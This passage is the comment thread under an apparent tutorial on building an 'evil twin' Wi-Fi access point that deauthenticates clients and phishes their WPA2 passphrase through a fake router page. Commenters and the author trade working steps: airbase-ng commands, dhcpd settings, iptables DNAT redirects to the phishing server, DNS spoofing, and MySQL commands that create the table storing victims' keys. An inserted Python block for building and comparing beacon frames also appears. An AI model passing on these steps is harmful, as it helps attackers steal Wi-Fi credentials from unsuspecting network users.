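Run it as-is to see the generated config and rules for the sample; on the attack box, feed it the real `ifconfig wlan2` output instead of the sample. Since Apache listens on every address by default, the DNAT target can equally be the fake AP's own gateway address (net[1]) rather than the uplink IP, which removes the dependency on the uplink being up when the captive page is served.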



redness (180 days)

Hi guys, everything went smoothly except for this part... please assist

mysql> select * from content;

Empty set (0.00 sec)



johny (179 days)

This method is a TOTAL fake, like most of them cracking WPA, for example the dictionary attack. The little kids put their password in the first line of the dictionary file and BOOM, WPA cracked in 1 sec. LMAO all the time.

Here is why this method will never work. The client has stored a profile connecting to that WPA encrypted wi-fi network. IT IS ENCRYPTED. It is not an open network. SO whenever the client tries to communicate with the AP all of its DATA packets will be encrypted. So you are setting up an EVIL TWIN that cannot decode the encrypted data packets of the client, because you do not know the WPA key. So the client will drop the connection.

Practically the client can only authenticate and associate with your evil twin AP. It will not be able to communicate with it.

That method would work only if the AP has no encryption. The client will send DATA packets unencrypted and it will be able to communicate with the AP, showing it the captive web page portal.


admin (177 days)

Hey John!

I do enjoy an argument, but you lack research on your comment... so no argument.

First, I would like to say that I posted this method on a few different forums, all of which got many comments and feedback from security enthusiasts.

To my surprise, actually a lot of people said they had been using this method for a while (seen on BT forums) and even contributed their own tips to it!

Now to simply explain the method to you: using airbase-ng we are capable of deauthenticating the victim and having him connect back to our network instead of his, thanks to the "Accept all probes" option. Of course, you will need decent gear for this.

From there, we social engineer the victim (he thinks he is in his own network) by redirecting to a page with the password, or perhaps a router update, etc.


R3V0LV3R (177 days)

I have a problem redirecting the traffic. I don't get the Verizon page that I downloaded, because when I try connecting with it, it says limited access and I don't get redirected to the Apache server.

BTW, how do I know the IP that I want to redirect the traffic to?

You just put a random number without telling us how you chose it?


WPA/WPA2 Hacking Without Wordlist/Bruteforce « Red Devils Penetration Testing (172 days)

[...] : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/ [...]


rico (168 days)

Hello sir.

Could you help me with this error?

root@bt:~# mysql -u root -p

Enter password:

ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)

Thank you in advance.


cristy (158 days)

You have to start the MySQL service. Type this command in a terminal: /etc/init.d/mysql start

and hit enter; after that, log in to MySQL with password: toor


NightCoder (155 days)

Great... bro, I hope you show us the same way on Windows.


matt (152 days)


Can anybody help me out? What should my config file look like if my default gateway on my router is



admin (150 days)

You can use the same config in the command section!

Save it in the same location: /etc/dhcp3/dhcpd.conf

Good luck!



Me (150 days)

Yeah, but why not take a weaker encryption algorithm like WEP or one of the many, many WPA2 variants (including WPA RADIUS and WPA MD5) as the fake access point and let the user enter their password the NORMAL way, and crack the encrypted (but more weakly encrypted than WPA2 AES) password that you will get back from the client when he tries to enter his password the *normal* way.


admin (150 days)

I see what you're saying and I like the idea... we could then use the many password websites (md5decrypter, etc.) to query the hashes? Or would they still be salted?

I did improve this method a bit by using airbase instead of the manual config, and other details, as the post is almost a year old.

But I will take a look into creating the MD5 access point.


arminaven (148 days)

Hi!!

I tried this method for 30 days, but until now I have been unsuccessful. My problem is, when I finished this method, when the victim clicks my fake AP, can't access, and then no result, but when I type my IP ( in the victim's browser, the fake AP worked, and when the victim types the password, the password is stored in my database. This can run if the victim types my IP, so I think my problem is in ddns-update-style ad-hoc;. The information of my IP is like this:

Do I have to modify the ddns-update-style ad-hoc; because my IP

Please help me.

Sorry about my English.

Thanks for your attention.


admin (127 days)

Hey arminaven!

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



matt (147 days)

I have the same problem arminaven, everything seems to be working OK. When I type localhost on the attacker computer everything works great. When I try to connect to the AP with the victim's computer, it doesn't let me connect. Anybody got any




admin (127 days)

Hey matt!

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.


Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



NightCoder (145 days)


Like arminaven says... me too: on the victim computer I can connect to the fake AP, but I can't see my page; I see it only if I type my IP(

Any help guys?


admin (127 days)

Hey NightCoder!

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



bud (127 days)

Hi admin.

I have read all the posts here but it isn't clear to me.

What I want to ask is this, if you have time to help.

1. Victim AP is a Cisco modem router

2. Do I need to find its IP address, and how?

3. How can I find its ISP?

4. Assuming that I found all the information required for this AP, can you rewrite all the commands with the required adjustments using the actual IP of my AP, which is

5. How can a different web page asking for WPA2 verification be compiled? In this case we need a fake Cisco web page, whose default IP found on the internet is (I pinged 'cisco.com' from my cmd.exe)


admin (127 days)

Hey bud!

2) The IP address is not needed, since the victim is trapped inside the evil twin network.

3) The ISP isn't needed per se... but it is good practice to save the victim BSSID... on a MAC address it works like this [XX:XX:XX]: the first 3 pairs represent the company... so if you know the company it becomes easier to guess the ISP (only Verizon uses that router model, for example)... the last 3 pairs represent the model.

I’m gonna skip to this:

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



vahid (126 days)


Thanks for your nice work.

First of all, please accept my apologies for my poor English writing.


I wanted to share the following idea:

As we know, every access point (AP) is broadcasting beacons. This beacon contains all the information about that access point. When a station wants to join an access point it first sends a probe request (although it can still stay silent and wait for the next beacon). Access points are designed to respond to a probe request packet with a probe response. The probe response contains the same information as the beacon. What we can do is this: in the fake AP's beacon copy exactly the same information as in the victim AP, but in the probe response reveal that the AP is open.

As you know, Windows 7 and Vista are designed such that in the background they search for the beacons, and whenever they find another access point with the identical name and identical security configuration they try to automatically connect to it, and as the first step they send a probe request to the found AP.

In this way there will be no need for deauth of clients, and clients would not see the alarm of connecting to an unsecured AP.
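The beacon/probe-response idea in the comment above comes down to two management frames for the same SSID that disagree on security: the beacon carries the Privacy bit and an RSN element, the probe response does not. The example below is added here and is my own code, not vahid's or the post's. It constructs both frame bodies (the part after the 802.11 MAC header) with a minimal RSN element for WPA2-PSK with CCMP, parses the fields a client matches against a stored profile (SSID, channel, Privacy bit, AKM suites), and flags the inconsistency, which is also exactly the tell a wireless monitor can use to spot such an evil twin. The SSID, channel and byte layout are constructed for the example; the suite selectors and element IDs are the IEEE 802.11 values.

```python
import struct

# 802.11 capability bit and element IDs used below (IEEE 802.11 values).
CAP_ESS = 0x0001
CAP_PRIVACY = 0x0010
IE_SSID, IE_DS_PARAM, IE_RSN = 0, 3, 48
AKM_NAMES = {1: "802.1X", 2: "PSK"}
FIXED_FMT = "<QHH"  # timestamp, beacon interval, capability info


def build_mgmt_body(ssid, channel, wpa2_psk=True):
    """Constructed beacon / probe-response body: fixed fields, then SSID,
    DS Parameter (channel) and, for a WPA2-PSK network, a minimal RSN
    element (CCMP group and pairwise cipher, PSK AKM, no RSN capabilities)."""
    cap = CAP_ESS | (CAP_PRIVACY if wpa2_psk else 0)
    body = struct.pack(FIXED_FMT, 0, 100, cap)
    raw = ssid.encode()
    body += bytes([IE_SSID, len(raw)]) + raw
    body += bytes([IE_DS_PARAM, 1, channel])
    if wpa2_psk:
        ccmp, psk = b"\x00\x0f\xac\x04", b"\x00\x0f\xac\x02"
        rsn = (struct.pack("<H", 1) + ccmp            # version, group cipher
               + struct.pack("<H", 1) + ccmp          # 1 pairwise cipher
               + struct.pack("<H", 1) + psk           # 1 AKM suite
               + struct.pack("<H", 0))                # RSN capabilities
        body += bytes([IE_RSN, len(rsn)]) + rsn
    return body


def parse_ies(body, offset):
    """Walk the tagged parameters; reject a truncated element rather than
    silently reading past the end of the frame."""
    ies = {}
    while offset < len(body):
        if offset + 2 > len(body):
            raise ValueError("dangling IE header")
        tag, length = body[offset], body[offset + 1]
        value = body[offset + 2: offset + 2 + length]
        if len(value) != length:
            raise ValueError(f"IE {tag} truncated")
        ies[tag] = value
        offset += 2 + length
    return ies


def parse_mgmt_body(body):
    """Extract what a client compares against a stored profile: SSID,
    channel, the Privacy bit and the RSN AKM suites (empty if no RSN IE)."""
    _ts, _interval, cap = struct.unpack_from(FIXED_FMT, body, 0)
    ies = parse_ies(body, struct.calcsize(FIXED_FMT))
    akms = []
    if IE_RSN in ies:
        rsn = ies[IE_RSN]
        pos = 2 + 4                                   # skip version + group cipher
        n_pair = struct.unpack_from("<H", rsn, pos)[0]
        pos += 2 + 4 * n_pair                         # skip pairwise suite list
        n_akm = struct.unpack_from("<H", rsn, pos)[0]
        pos += 2
        for _ in range(n_akm):
            akms.append(AKM_NAMES.get(rsn[pos + 3], f"type-{rsn[pos + 3]}"))
            pos += 4
    ds = ies.get(IE_DS_PARAM, b"")
    return {
        "ssid": ies.get(IE_SSID, b"").decode("utf-8", "replace"),
        "channel": ds[0] if len(ds) == 1 else None,
        "privacy": bool(cap & CAP_PRIVACY),
        "akms": akms,
    }


def security_mismatch(beacon_body, probe_resp_body):
    """True when a beacon and a probe response for the same SSID disagree on
    security (Privacy bit or AKM suites): the inconsistency a monitor flags."""
    b, p = parse_mgmt_body(beacon_body), parse_mgmt_body(probe_resp_body)
    if b["ssid"] != p["ssid"]:
        return False
    return b["privacy"] != p["privacy"] or b["akms"] != p["akms"]


if __name__ == "__main__":
    beacon = build_mgmt_body("HomeNet", 6, wpa2_psk=True)
    probe = build_mgmt_body("HomeNet", 6, wpa2_psk=False)
    print("beacon       :", parse_mgmt_body(beacon))
    print("probe resp   :", parse_mgmt_body(probe))
    print("mismatch     :", security_mismatch(beacon, probe))
```

To apply the check to live traffic, feed parse_mgmt_body the frame body captured on the monitor interface (everything after the 24-byte management MAC header) and pair beacons with probe responses by SSID and BSSID; a real client's own matching logic is in its supplicant, so whether it accepts the open probe response is a separate question from whether the mismatch is visible on the air.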


bud (124 days)

Hey admin.

I have run ifconfig and got:

root@root:~# ifconfig

lo Link encap:Local Loopback

inet addr: Mask:

inet6 addr: ::1/128 Scope:Host


RX packets:579 errors:0 dropped:0 overruns:0 frame:0

TX packets:579 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:71001 (71.0 KB) TX bytes:71001 (71.0 KB)

wlan0 Link encap:Ethernet HWaddr d8:5d:4c:90:5f:c2

inet addr: Bcast: Mask:

inet6 addr: fe80::da5d:4cff:fe90:5fc2/64 Scope:Link


RX packets:14006 errors:0 dropped:0 overruns:0 frame:0

TX packets:2940 errors:0 dropped:0 overruns:0 carrier:0


collisions:0 txqueuelen:1000

RX bytes:4874931 (4.8 MB) TX bytes:314334

Which correction could be made in gedit /etc/dhcp3/dhcpd.conf?


ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option subnet-mask;

option broadcast-address;

option routers

option domain-name-servers;





cristy (120 days)

I think instead of installing a dhcp3 server and setting all the parameters it's easier to do a dnsspoof on the wireless interface, isn't it??


sparta (117 days)

Thanks for the tutorial.

I have one question:

Can I do this with one wifi card, i.e. connect to the internet and clone the AP and deauthenticate the client? Please answer, with no damage to my wifi card.



Pete (114 days)


All this might be working, I believe.

But when I create my "Twin" and start airodump I see my created AP, but the channel is constantly changing. Of course nobody can connect...

Though my command was like airbase-ng -e "APname" -c 1 -a C0:25:06:98:50:6E mon0, so it should send only on ch1, but it doesn't.

What's going wrong here?

Greetz, Pete


Jess (111 days)

Hi!!!

Great video. I have a problem. I did all the steps and the fake webpage appears, and I try to put in the password,

but the screen shows:

" Please try again... Can't locate the db. "

and after I start MySQL:

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use wpa2;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from content;
Empty set (0.00 sec)

I type the password but nothing appears, please help me.



Marcus (102 days)

This is a great tutorial, but could you tell me please, do you need to be connected to the internet in the first place in order to crack it? Is it possible to do that without being connected to the net? Help me please.



John Nuber (93 days)

Hello and help

First, I am familiar with this approach and the work of Douglas from WeakNet Labs, as he has produced a phishing program in his distro for WPA Enterprise which can be adapted for WPA shared keys etc. All aspects of the WeakNet Labs program are

I have managed to get your program up and working. I can associate to the phoney AP BUT I cannot get your web pages to show up on the target's computer when the victim tries to surf the net. The pages do show up on my computer.

My Apache2 gives me a warning and then goes to and this does run up the web pages in the /var/www/ folder on my computer.

I am running two rtl8187 USOW36H receivers, wlan0 and wlan1. wlan1 is associated to another wifi receiver and has internet access. I have used both the IP of wlan1 and the IP of the associated AP. I still cannot get the web pages to show up on the victim's computer.

All other aspects of this approach, as far as I could test, work great!!


Matthieu (90 days)

Hi, thank you very much for this post!!

I just have a problem with the traffic redirection; the command doesn't work for me.

"iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination
iptables -t nat -A POSTROUTING -j MASQUERADE"

On the victim machine I am supposed to be redirected to the Attack Page (http:// but I'm not.

Do you know where the problem comes from?



Matthieu (85 days)

Hi Admin,

I found another way to do it: I used Ettercap-NG with the dns-spoofing plugin and that worked very well.

Thank you for the quality of your blog!!


Sangamesh (86 days)

Hi sir, I tried to follow all your steps, but I'm stuck in checking the MySQL and Apache services. I typed "localhost" in the browser, but I got

"It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet."

I'm new to this BT5, so requesting you to help me out.

Thanks, good day :)


Asfand (77 days)


I applied all the commands... I got a problem, please help.

The victim's router signal does not vanish...

Please help...

Thanks in advance.


t.vanhuong (74 days)

Can eth0 be the 2nd wireless card?

Please give me feedback!



Aroz (24 days)

Hello admin.

I am stuck at the last stage. I have done everything said and it works.

But at the end, when I use MySQL, I get this:

ERROR 1146 (42S02): Table "wpa2.content" doesn't exist.



Mukesh (13 days)

Hi everyone. For those of you having problems with MySQL, here are the commands; be sure not to leave out the ';' after each line.

Start the MySQL server as normal.

Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database (type exactly as it is, including ';'):

create database wpa2;

use wpa2;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));

Other commands you should play with are:

show databases;

show tables;

INSERT into content values ('12345','12345');

This command will list the content:

SELECT * from content;

I hope this helps.